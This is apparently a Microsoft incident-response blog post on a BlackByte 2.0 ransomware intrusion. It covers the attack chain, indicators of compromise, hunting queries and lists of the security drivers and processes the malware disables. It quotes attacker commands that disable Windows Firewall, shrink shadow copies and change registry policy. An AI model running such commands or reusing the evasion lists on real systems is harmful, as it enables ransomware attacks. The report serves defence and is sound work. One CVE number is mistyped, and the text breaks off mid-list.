"2023-07-18T21:01:53", "description": "As ransomware attacks continue to grow in number and sophistication, threat actors can quickly impact business operations if organizations are not well prepared. In a recent investigation by Microsoft Incident Response (previously known as Microsoft Detection and Response Team \u2013 DART) of an intrusion, we found that the threat actor progressed through the full attack chain, from initial access to impact, in less than five days, causing significant business disruption for the victim organization.\n\nOur investigation found that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives. These techniques included:\n\n * Exploitation of unpatched internet-exposed Microsoft Exchange Servers\n * Web shell deployment facilitating remote access\n * Use of living-off-the-land tools for persistence and reconnaissance\n * Deployment of Cobalt Strike beacons for command and control (C2)\n * Process hollowing and the use of vulnerable drivers for defense evasion\n * Deployment of custom-developed backdoors to facilitate persistence\n * Deployment of a custom-developed data collection and exfiltration tool\nFigure 1. BlackByte 2.0 ransomware attack chain\n\nIn this blog, we share details of our investigation into the end-to-end attack chain, exposing security weaknesses that the threat actor exploited to advance their attack. As we learned from Microsoft\u2019s tracking of ransomware attacks and the [cybercriminal economy](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) that enables them, disrupting common attack patterns could stop many of the attacker activities that precede ransomware deployment. This case highlights that common security hygiene practices go a long way in preventing, identifying, and responding to malicious activity as early as possible to mitigate the impact of ransomware attacks. We encourage organizations to follow the outlined mitigation steps, including ensuring that internet-facing assets are up to date and configured securely. We also share indicators of compromise, detection details, and hunting guidance to help organizations identify and respond to these attacks in their environments. \n\n## Forensic analysis\n\n### Initial access and privilege escalation\n\nTo obtain initial access into the victim\u2019s environment, the threat actor was observed exploiting the [ProxyShell vulnerabilities](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 on unpatched Microsoft Exchange Servers. The exploitation of these vulnerabilities allowed the threat actor to:\n\n * Attain system-level privileges on the compromised Exchange host\n * Enumerate LegacyDN of users by sending Autodiscover requests, including SIDs of users\n * Construct a valid authentication token and use it against the Exchange PowerShell backend\n * Impersonate domain admin users and create a web shell by using the _New-MailboxExportRequest_ cmdlet\n * Create web shells to obtain remote control on affected servers\n\nThe threat actor was observed operating from the following IP to exploit ProxyShell and access the web shell:\n\n * 185.225.73[.]244\n\n### Persistence\n\n**Backdoor**\n\nAfter gaining access to a device, the threat actor created the following registry run keys to run a payload each time a user signs in:\n\nRegistry key| Value name| Value data \n---|---|--- \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\Users\\user\\Downloads\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\temp\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\systemtest\\api-system.png,Default \n \nThe file _api-msvc.dll _(SHA-256: 4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e) was determined to be a backdoor capable of collecting system information, such as the installed antivirus products, device name, and IP address. This information is then sent via HTTP POST request to the following C2 channel:\n\n * _hxxps://myvisit[.]alteksecurity[.]org/t_\n\nThe organization was not using Microsoft Defender Antivirus, which detects this malware as Trojan:Win32/Kovter!MSR, as the primary antivirus solution, and the backdoor was allowed to run.\n\nAn additional file, _api-system.png_, was identified to have similarities to _api-msvc.dll_. This file behaved like a DLL, had the same default export function, and also leveraged run keys for persistence.\n\n**Cobalt Strike Beacon**\n\nThe threat actor leveraged Cobalt Strike to achieve persistence. The file _sys.exe _(SHA-256: 5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103), detected by Microsoft Defender Antivirus as Trojan:Win64/CobaltStrike!MSR, was determined to be a Cobalt Strike Beacon and was downloaded directly from the file sharing service _temp[.]sh_:\n\n * _hxxps://temp[.]sh/szAyn/sys.exe_\n\nThis beacon was configured to communicate with the following C2 channel:\n\n * 109.206.243[.]59:443\n\n**AnyDesk******\n\nThreat actors leverage legitimate remote access tools during intrusions to blend into a victim network. In this case, the threat actor utilized the remote administration tool AnyDesk, to maintain persistence and move laterally within the network. AnyDesk was installed as a service and was run from the following paths:\n\n * _C:\\systemtest\\anydesk\\AnyDesk.exe_\n * _C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe_\n * _C:\\Scripts\\AnyDesk.exe_\n\nSuccessful connections were observed in the AnyDesk log file _ad_svc.trace_ involving anonymizer service IP addresses linked to TOR and MULLVAD VPN, a common technique that threat actors employ to obscure their source IP ranges.\n\n### Reconnaissance\n\nWe found the presence and execution of the network discovery tool NetScan being used by the threat actor to perform network enumeration using the following file names:\n\n * _netscan.exe _(SHA-256:1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n * _netapp.exe _(SHA-256:1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n\nAdditionally, execution of AdFind (SHA-256: f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e), an Active Directory reconnaissance tool, was observed in the environment.\n\n### Credential access\n\nEvidence of likely usage of the credential theft tool Mimikatzwas also uncovered through the presence of a related log file _mimikatz.log_. Microsoft IR assesses that Mimikatz was likely used to attain credentials for privileged accounts.\n\n### Lateral movement\n\nUsing compromised domain admin credentials, the threat actor used Remote Desktop Protocol (RDP) and PowerShell remoting to obtain access to other servers in the environment, including domain controllers.\n\n### Data staging and exfiltration\n\nIn one server where Microsoft Defender Antivirus was installed, a suspicious file named _explorer.exe_ was identified, detected as Trojan:Win64/WinGoObfusc.LK!MT, and quarantined. However, because tamper protection wasn\u2019t enabled on this server, the threat actor was able to disable the Microsoft Defender Antivirus service, enabling the threat actor to run the file using the following command:\n\nexplorer.exe P@$$w0rd\n\nAfter reverse engineering_ explorer.exe_, we determined it to be ExByte, a GoLang-based tool developed and commonly used in BlackByte ransomware attacks for collection and exfiltration of files from victim networks. This tool is capable of enumerating files of interest across the network and, upon execution, creates a log file containing a list of files and associated metadata. Multiple log files were uncovered during the investigation in the path:\n\n * _C:\\Exchange\\MSExchLog.log_\n\nAnalysis of the binary revealed a list of file extensions that are targeted for enumeration.\n\nFigure 2. Binary analysis showing file extensions enumerated by _explorer.exe_\n\nForensic analysis identified a file named _data.txt_ that was created and later deleted after ExByte execution. This file contained obfuscated credentials that ExByte leveraged to authenticate to the popular file sharing platform Mega NZ using the platform\u2019s API at:\n\n * _hxxps://g.api.mega.co[.]nz_\nFigure 3. Binary analysis showing explorer.exe functionality for connecting to file sharing service MEGA NZ\n\nWe also determined that this version of Exbyte was crafted specifically for the victim, as it contained a hardcoded device name belonging to the victim and an internal IP address.\n\n**ExByte execution flow**\n\nUpon execution, ExByte decodes several strings and checks if the process is running with privileged access by reading _\\\\\\\\.\\PHYSICALDRIVE0_:\n\n * If this check fails, _ShellExecuteW_ is invoked with the _IpOperation_ parameter _RunAs_, which runs _explorer.exe_ with elevated privileges.\n\nAfter this access check, _explorer.exe_ attempts to read the _data.txt_ file in the current location:\n\n * If the text file doesn\u2019t exist, it invokes a command for self-deletion and exits from memory:\n \n \n C:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 10 > nul & Del <PATH>\\explorer.exe /F /Q\n \n\n * If _data.txt_ exists, _explorer.exe_ reads the file, passes the buffer to Base64 decode function, and then decrypts the data using the key provided in the command line. The decrypted data is then parsed as JSON below and fed for login function:\n \n \n {\n \t\u201ca\u201d:\u201dus0\u201d,\n \t\u201cuser\u201d:\u201d<CONTENT FROM data.txt>\u201d\n }\n \n\nFinally, it forms a URL for sign-in to the API of the service MEGA NZ:\n\n * _hxxps://g.api.mega.co[.]nz/cs?id=1674017543_\n\n### Data encryption and destruction\n\nOn devices where files were successfully encrypted, we identified suspicious executables, detected by Microsoft Defender Antivirus as Trojan:Win64/BlackByte!MSR, with the following names:\n\n * _wEFT.exe_\n * _schillerized.exe_\n\nThe files were analyzed and determined to be BlackByte 2.0 binaries responsible for encryption across the environment. The binaries require an 8-digit key number to encrypt files.\n\nTwo modes of execution were identified:\n\n * When the _-s_ parameter is provided, the ransomware self-deletes and encrypts the machine it was executed on.\n * When the _-a_ parameter is provided, the ransomware conducts enumeration and uses an Ultimate Packer Executable (UPX) packed version of PsExec to deploy across the network. Several domain admin credentials were hardcoded in the binary, facilitating the deployment of the binary across the network.\n\nDepending on the switch (_-s_ or _-a_), execution may create the following files:\n\n * _C:\\SystemData\\M8yl89s7.exe_ (UPX-packed PsExec with a random name; SHA-256: ba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f)\n * _C:\\SystemData\\wEFT.exe_ (Additional BlackByte binary)\n * _C:\\SystemData\\MsExchangeLog1.log_ (Log file)\n * _C:\\SystemData\\rENEgOtiAtES _(A vulnerable (CVE-2019-16098) driver _RtCore64.sys_ used to evade detection by installed antivirus software; SHA-256: 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)\n * _C:\\SystemData\\iHu6c4.ico_ (Random name \u2013 BlackBytes icon)\n * _C:\\SystemData\\BB_Readme_file.txt_ (BlackByte ReadMe file)\n * _C:\\SystemData\\skip_bypass.txt_ (Unknown)\n\n**BlackByte 2.0 ransomware capabilities**\n\nSome capabilities identified for the BlackByte 2.0 ransomware were:\n\n * Antivirus bypass\n * The file _rENEgOtiAtES_ created matches _RTCore64.sys_, a vulnerable driver (CVE-2049-16098) that allows any authenticated user to read or write to arbitrary memory\n * The BlackByte binary then creates and starts a service named _RABAsSaa_ calling _rENEgOtiAtES_, and exploits this service to evade detection by installed antivirus software\n * Process hollowing \n * Invokes _svchost.exe_, injects to it to complete device encryption, and self-deletes by executing the following command: \n * `cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del \u201cPATH_TO_BLACKBYTE\u201d /F /Q`\n * Modification / disabling of Windows Firewall \n * The following commands are executed to either modify existing Windows Firewall rules, or to disable Windows Firewall entirely:\n * `cmd /c netsh advfirewall set allprofiles state off`\n * * `cmd /c netsh advfirewall firewall set rule group=\u201dFile and Printer Sharing\u201d new enable=Yes`\n * `cmd /c netsh advfirewall firewall set rule group=\u201dNetwork Discovery\u201d new enable=Yes`\n * Modification of volume shadow copies \n * The following commands are executed to destroy volume shadow copies on the machine:\n * `cmd /c vssadmin Resize ShadowStorge /For=B:\\ /On=B:\\ /MaxSize=401MB`\n * `cmd /c vssadmin Resize ShadowStorage /For=B:\\ /On=B:\\ /MaxSize=UNBOUNDED`\n * Modification of registry keys/values \n * The following commands are executed to modify the registry, facilitating elevated execution on the device:\n * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`\n * * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f`\n * `cmd /c reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f`\n * Additional functionality\n * Ability to terminate running services and processes\n * Ability to enumerate and mount volumes and network shares for encryption\n * Perform anti-forensics technique timestomping (sets the file time of encrypted and ReadMe file to 2000-01-01 00:00:00)\n * Ability to perform anti-debugging techniques\n\n## Recommendations\n\nTo guard against BlackByte ransomware attacks, Microsoft recommends the following:\n\n * Ensure that you have a patch management process in place and that patching for internet-exposed devices is prioritized; Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools like [Microsoft Defender Vulnerability Management**_ _**](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide>)**__**\n * Implement an endpoint detection and response (EDR) solution like [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) to gain visibility into malicious activity in real time across your network\n * Ensure antivirus protections are updated regularly by [turning on cloud-based protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) and that your antivirus solution is configured to block threats\n * Enable [tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) to prevent components of Microsoft Defender Antivirus from being disabled\n * Block inbound traffic from IPs specified in the indicators of compromise section of this report\n * Block inbound traffic from TOR exit nodes\n * Block inbound access from unauthorized public VPN services\n * Restrict administrative privileges to prevent authorized system changes\n\n## Conclusion\n\nBlackByte ransomware attacks target organizations that have infrastructure with unpatched vulnerabilities. As outlined in the [Microsoft Digital Defense Report](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>), common security hygiene practices, including keeping systems up to date, could protect against 98% of attacks.\n\nAs new tools are being developed by threat actors, a modern threat protection solution like Microsoft 365 Defender is necessary to prevent and detect the multiple techniques used in the attack chain, especially where the threat actor attempts to evade or disable specific defense mechanisms. Hunting for malicious behavior should be performed regularly in order to detect potential attacks that could evade detections, as a complementary activity for continuous monitoring from security tools alerts and incidents.\n\nTo understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/MicrosoftIR.\n\n## Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects this threat as the following malware:\n\n * Trojan:Win32/Kovter!MSR\n * Trojan:Win64/WinGoObfusc.LK!MT\n * Trojan:Win64/BlackByte!MSR\n * HackTool:Win32/AdFind!MSR\n * Trojan:Win64/CobaltStrike!MSR\n\n**Microsoft Defender for Endpoint**\n\nThe following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * 'CVE-2021-31207' exploit malware was detected\n * An active 'NetShDisableFireWall' malware in a command line was prevented from executing.\n * Suspicious registry modification.\n * \u2018Rtcore64\u2019 hacktool was detected\n * Possible ongoing hands-on-keyboard activity (Cobalt Strike)\n * A file or network connection related to a ransomware-linked emerging threat activity group detected\n * Suspicious sequence of exploration activities\n * A process was injected with potentially malicious code\n * Suspicious behavior by cmd.exe was observed\n * 'Blackbyte' ransomware was detected\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-34473\n * CVE-2021-34523\n * CVE-2021-31207\n * CVE-2019-16098\n\n## Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\n**ProxyShell web shell creation events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"ExcludeDumpster\",\"New-ExchangeCertificate\") and ProcessCommandLine has_any (\"-RequestFile\",\"-FilePath\")\n \n\n**Suspicious vssadmin events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"vssadmin\",\"vssadmin.exe\") and ProcessCommandLine has \"Resize ShadowStorage\" and ProcessCommandLine has_any (\"MaxSize=401MB\",\" MaxSize=UNBOUNDED\")\n \n\n**Detection for persistence creation using Registry Run keys**\n \n \n DeviceRegistryEvents \n | where ActionType == \"RegistryValueSet\" \n | where (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnce\" and RegistryValueName == \"MsEdgeMsE\") \n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnceEx\" and RegistryValueName == \"MsEdgeMsE\")\n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\Run\" and RegistryValueName == \"MsEdgeMsE\")\n | where RegistryValueData startswith @\"rundll32\"\n | where RegistryValueData endswith @\".dll,Default\"\n | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData\n \n\n**Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>)\n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web%20Shells%20Threat%20Protection/Hunting%20Queries/WebShellActivity.yaml>)\n * [Suspicious file downloads on Exchange Servers](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>)\n * [Firewall rule changes](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/MultipleDataSources/FirewallRuleChanges_using_netsh.yaml>)\n * [Shadow copy deletion](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/ShadowCopyDeletion.yml>)\n * [Anamolous RDP activity](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Solutions/UEBA%20Essentials/Hunting%20Queries/Anomalous%20RDP%20Activity.yaml>)\n\n## Indicators of compromise\n\nThe table below shows IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\nIndicator| Type| Description \n---|---|--- \n4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e| SHA-256| api-msvc.dll (Backdoor installed through RunKeys) \n5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103| SHA-256| sys.exe (Cobalt Strike Beacon) \n01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd| SHA-256| rENEgOtiAtES (Vulnerable driver RtCore64.sys created by BlackByte binary) \nba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f| SHA-256| [RANDOM_NAME].exe (UPX Packed PsExec created by BlackByte binary) \n1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e| SHA-256| \u201cnetscan.exe\u201d, \u201cnetapp.exe (Netscan network discovery tool) \nf157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e| SHA-256| AdFind.exe (Active Directory information gathering tool) \nhxxps://myvisit[.]alteksecurity[.]org/t| URL| C2 for backdoor api-msvc.dll \nhxxps://temp[.]sh/szAyn/sys.exe| URL| Download URL for sys.exe \n109.206.243[.]59| IP Address| C2 for Cobalt Strike Beacon sys.exe \n185.225.73[.]244| IP Address| Originating IP address for ProxyShell exploitation and web shell interaction \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Appendix\n\nFile extensions targeted by BlackByte binary for encryption:\n\n.4dd| .4dl| .accdb| .accdc| .accde| .accdr| .accdt| .accft \n---|---|---|---|---|---|---|--- \n.adb| .ade| .adf| .adp| .arc| .ora| .alf| .ask \n.btr| .bdf| .cat| .cdb| .ckp| .cma| .cpd| .dacpac \n.dad| .dadiagrams| .daschema| .db| .db-shm| .db-wal| .db3| .dbc \n.dbf| .dbs| .dbt| .dbv| . dbx| . dcb| . dct| . dcx \n. ddl| . dlis| . dp1| . dqy| . dsk| . dsn| . dtsx| . dxl \n. eco| . ecx| . edb| . epim| . exb| . fcd| . fdb| . fic \n. fmp| . fmp12| . fmpsl| . fol| .fp3| . fp4| . fp5| . fp7 \n. fpt| . frm| . gdb| . grdb| . gwi| . hdb| . his| . ib \n. idb| . ihx| . itdb| . itw| . jet| . jtx| . kdb| . kexi \n. kexic| . kexis| . lgc| . lwx| . maf| . maq| . mar| . masmav \n. mdb| . mpd| . mrg| . mud| . mwb| . myd| . ndf| . nnt \n. nrmlib| . ns2| . ns3| . ns4| . nsf| . nv| . nv2| . nwdb \n. nyf| . odb| . ogy| . orx| . owc| . p96| . p97| . pan \n. pdb| . pdm| . pnz| . qry| . qvd| . rbf| . rctd| . rod \n. rodx| . rpd| . rsd| . sas7bdat| . sbf| . scx| . sdb| . sdc \n. sdf| . sis| . spg| . sql| . sqlite| . sqlite3| . sqlitedb| . te \n. temx| . tmd| . tps| . trc| . trm| . udb| . udl| . usr \n. v12| . vis| . vpd| . vvv| . wdb| . wmdb| . wrk| . xdb \n. xld| . xmlff| . abcddb| . abs| . abx| . accdw| . and| . db2 \n. fm5| . hjt| . icg| . icr| . kdb| . lut| . maw| . mdn \n. mdt| | | | | | | \n \nShared folders targeted for encryption (Example: _\\\\\\\\[IP address]\\Downloads_):\n\nUsers| Backup| Veeam| homes| home \n---|---|---|---|--- \nmedia| common| Storage Server| Public| Web \nImages| Downloads| BackupData| ActiveBackupForBusiness| Backups \nNAS-DC| DCBACKUP| DirectorFiles| share| \n \nFile extensions ignored:\n\n.ini| .url| .msilog| .log| .ldf| .lock| .theme| .msi \n---|---|---|---|---|---|---|--- \n.sys| .wpx| .cpl| .adv| .msc| .scr| .key| .ico \n.dll| .hta| .deskthemepack| .nomedia| .msu| .rtp| .msp| .idx \n.ani| .386| .diagcfg| .bin| .mod| .ics| .com| .hlp \n .spl| .nls| .cab| .exe| .diagpkg| .icl| .ocx| .rom \n.prf| .thempack| .msstyles| .icns| .mpa| .drv| .cur| .diagcab \n.cmd| .shs| | | | | | \n \nFolders ignored:\n\nwindows| boot| program files (x86)| windows.old| programdata \n---|---|---|---|--- \nintel| bitdefender| trend micro| windowsapps| appdata \napplication data| system volume information| perflogs| msocache| \n \nFiles ignored:\n\nbootnxt| ntldr| bootmgr| thumbs.db \n---|---|---|--- \nntuser.dat| bootsect.bak| autoexec.bat| iconcache.db \nbootfont.bin| | | \n \nProcesses terminated:\n\nteracopy| teamviewer| nsservice| nsctrl| uranium \n---|---|---|---|--- \nprocesshacker| procmon| pestudio| procmon64| x32dbg \nx64dbg| cff explorer| procexp| pslist| tcpview \ntcpvcon| dbgview| rammap| rammap64| vmmap \nollydbg| autoruns| autorunssc| filemon| regmon \nidaq| idaq64| immunitydebugger| wireshark| dumpcap \nhookexplorer| importrec| petools| lordpe| sysinspector \nproc_analyzer| sysanalyzer| sniff_hit| windbg| joeboxcontrol \njoeboxserver| resourcehacker| fiddler| httpdebugger| dumpit \nrammap| rammap64| vmmap| agntsvc| cntaosmgr \ndbeng50| dbsnmp| encsvc| infopath| isqlplussvc \nmbamtray| msaccess| msftesql| mspub| mydesktopqos \nmydesktopservice| mysqld| mysqld-nt| mysqld-opt| Ntrtscan \nocautoupds| ocomm| ocssd| onenote| oracle \noutlook| PccNTMon| powerpnt| sqbcoreservice| sql \nsqlagent| sqlbrowser| sqlservr| sqlwriter| steam \nsynctime| tbirdconfig| thebat| thebat64| thunderbird \ntmlisten| visio| winword| wordpad| xfssvccon \nzoolz| | | | \n \nServices terminated:\n\nCybereasonRansomFree| vnetd| bpcd| SamSs| TeraCopyService \n---|---|---|---|--- \nmsftesql| nsService| klvssbridge64| vapiendpoint| ShMonitor \nSmcinst| SmcService| SntpService| svcGenericHost| Swi_ \nTmCCSF| tmlisten| TrueKey| TrueKeyScheduler| TrueKeyServiceHelper \nWRSVC| McTaskManager| OracleClientCache80| mfefire| wbengine \nmfemms| RESvc| mfevtp| sacsvr| SAVAdminService \nSepMasterService| PDVFSService| ESHASRV| SDRSVC| FA_Scheduler \nKAVFS| KAVFS_KAVFSGT| kavfsslp| klnagent| macmnsvc \nmasvc| MBAMService| MBEndpointAgent| McShield| audioendpointbuilder \nAntivirus| AVP| DCAgent| bedbg| EhttpSrv \nMMS| ekrn| EPSecurityService| EPUpdateService| ntrtscan \nEsgShKernel| msexchangeadtopology| AcrSch2Svc| MSOLAP$TPSAMA| Intel(R) PROSet Monitoring \nmsexchangeimap4| ARSM| unistoresvc_1af40a| ReportServer$TPS| MSOLAP$SYSTEM_BGC \nW3Svc| MSExchangeSRS| ReportServer$TPSAMA| Zoolz 2 Service| MSOLAP$TPS \naphidmonitorservice| SstpSvc| MSExchangeMTA| ReportServer$SYSTEM_BGC| Symantec System Recovery \nUI0Detect| MSExchangeSA| MSExchangeIS| ReportServer| MsDtsServer110 \nPOP3Svc| MSExchangeMGMT| SMTPSvc| MsDtsServer| IisAdmin \nMSExchangeES| EraserSvc11710| Enterprise Client Service| MsDtsServer100| NetMsmqActivator \nstc_raw_agent| VSNAPVSS| PDVFSService| AcrSch2Svc| Acronis \nCASAD2DWebSvc| CAARCUpdateSvc| McAfee| avpsus| DLPAgentService \nmfewc| BMR Boot Service| DefWatch| ccEvtMgr| ccSetMgr \nSavRoam| RTVsc screenconnect| ransom| sqltelemetry| msexch \nvnc| teamviewer| msolap| veeam| backup \nsql| memtas| vss| sophos| svc$ \nmepocs| wuauserv| | | \n \nDrivers that Blackbyte can bypass:\n\n360avflt.sys| 360box.sys| 360fsflt.sys| 360qpesv.sys| 5nine.cbt.sys \n---|---|---|---|--- \na2acc.sys| a2acc64.sys| a2ertpx64.sys| a2ertpx86.sys| a2gffi64.sys \na2gffx64.sys| a2gffx86.sys| aaf.sys| aalprotect.sys| abrpmon.sys \naccessvalidator.sys| acdriver.sys| acdrv.sys| adaptivaclientcache32.sys| adaptivaclientcache64.sys \nadcvcsnt.sys| adspiderdoc.sys| aefilter.sys| agentrtm64.sys| agfsmon.sys \nagseclock.sys| agsyslock.sys| ahkamflt.sys| ahksvpro.sys| ahkusbfw.sys \nahnrghlh.sys| aictracedrv_am.sys| airship-filter.sys| ajfsprot.sys| alcapture.sys \nalfaff.sys| altcbt.sys| amfd.sys| amfsm.sys| amm6460.sys \namm8660.sys| amsfilter.sys| amznmon.sys| antileakfilter.sys| antispyfilter.sys \nanvfsm.sys| apexsqlfilterdriver.sys| appcheckd.sys| appguard.sys| appvmon.sys \narfmonnt.sys| arta.sys| arwflt.sys| asgard.sys| ashavscan.sys \nasiofms.sys| aswfsblk.sys| aswmonflt.sys| aswsnx.sys| aswsp.sys \naszfltnt.sys| atamptnt.sys| atc.sys| atdragent.sys| atdragent64.sys \naternityregistryhook.sys| atflt.sys| atrsdfw.sys| auditflt.sys| aupdrv.sys \navapsfd.sys| avc3.sys| avckf.sys| avfsmn.sys| avgmfi64.sys \navgmfrs.sys| avgmfx64.sys| avgmfx86.sys| avgntflt.sys| avgtpx64.sys \navgtpx86.sys| avipbb.sys| avkmgr.sys| avmf.sys| awarecore.sys \naxfltdrv.sys| axfsysmon.sys| ayfilter.sys| b9kernel.sys| backupreader.sys \nbamfltr.sys| bapfecpt.sys| bbfilter.sys| bd0003.sys| bddevflt.sys \nbdfiledefend.sys| bdfilespy.sys| bdfm.sys| bdfsfltr.sys| bdprivmon.sys \nbdrdfolder.sys| bdsdkit.sys| bdsfilter.sys| bdsflt.sys| bdsvm.sys \nbdsysmon.sys| bedaisy.sys| bemk.sys| bfaccess.sys| bfilter.sys \nbfmon.sys| bhdrvx64.sys| bhdrvx86.sys| bhkavka.sys| bhkavki.sys \nbkavautoflt.sys| bkavsdflt.sys| blackbirdfsa.sys| blackcat.sys| bmfsdrv.sys \nbmregdrv.sys| boscmflt.sys| bosfsfltr.sys| bouncer.sys| boxifier.sys \nbrcow_x_x_x_x.sys| brfilter.sys| brnfilelock.sys| brnseclock.sys| browsermon.sys \nbsrfsflt.sys| bssaudit.sys| bsyaed.sys| bsyar.sys| bsydf.sys \nbsyirmf.sys| bsyrtm.sys| bsysp.sys| bsywl.sys| bwfsdrv.sys \nbzsenspdrv.sys| bzsenth.sys| bzsenyaradrv.sys| caadflt.sys| caavfltr.sys \ncancelsafe.sys| carbonblackk.sys| catflt.sys| catmf.sys| cbelam.sys \ncbfilter20.sys| cbfltfs4.sys| cbfsfilter2017.sys| cbfsfilter2020.sys| cbsampledrv.sys \ncdo.sys| cdrrsflt.sys| cdsgfsfilter.sys| centrifyfsf.sys| cfrmd.sys \ncfsfdrv| cgwmf.sys| change.sys| changelog.sys| chemometecfilter.sys \nciscoampcefwdriver.sys| ciscoampheurdriver.sys| ciscosam.sys| clumiochangeblockmf.sys| cmdccav.sys \ncmdcwagt.sys| cmdguard.sys| cmdmnefs.sys| cmflt.sys| code42filter.sys \ncodex.sys| conduantfsfltr.sys| containermonitor.sys| cpavfilter.sys| cpavkernel.sys \ncpepmon.sys| crexecprev.sys| crncache32.sys| crncache64.sys| crnsysm.sys \ncruncopy.sys| csaam.sys| csaav.sys| csacentr.sys| csaenh.sys \ncsagent.sys| csareg.sys| csascr.sys| csbfilter.sys| csdevicecontrol.sys \ncsfirmwareanalysis.sys| csflt.sys| csmon.sys| cssdlp.sys| ctamflt.sys \nctifile.sys| ctinet.sys| ctrpamon.sys| ctx.sys| cvcbt.sys \ncvofflineflt32.sys| cvofflineflt64.sys| cvsflt.sys| cwdriver.sys| cwmem2k64.sys \ncybkerneltracker.sys| cylancedrv64.sys| cyoptics.sys| cyprotectdrv32.sys| cyprotectdrv64.sys \ncytmon.sys| cyverak.sys| cyvrfsfd.sys| cyvrlpc.sys| cyvrmtgn.sys \ndatanow_driver.sys| dattofsf.sys| da_ctl.sys| dcfafilter.sys| dcfsgrd.sys \ndcsnaprestore.sys| deepinsfs.sys| delete_flt.sys| devmonminifilter.sys| dfmfilter.sys \ndgedriver.sys| 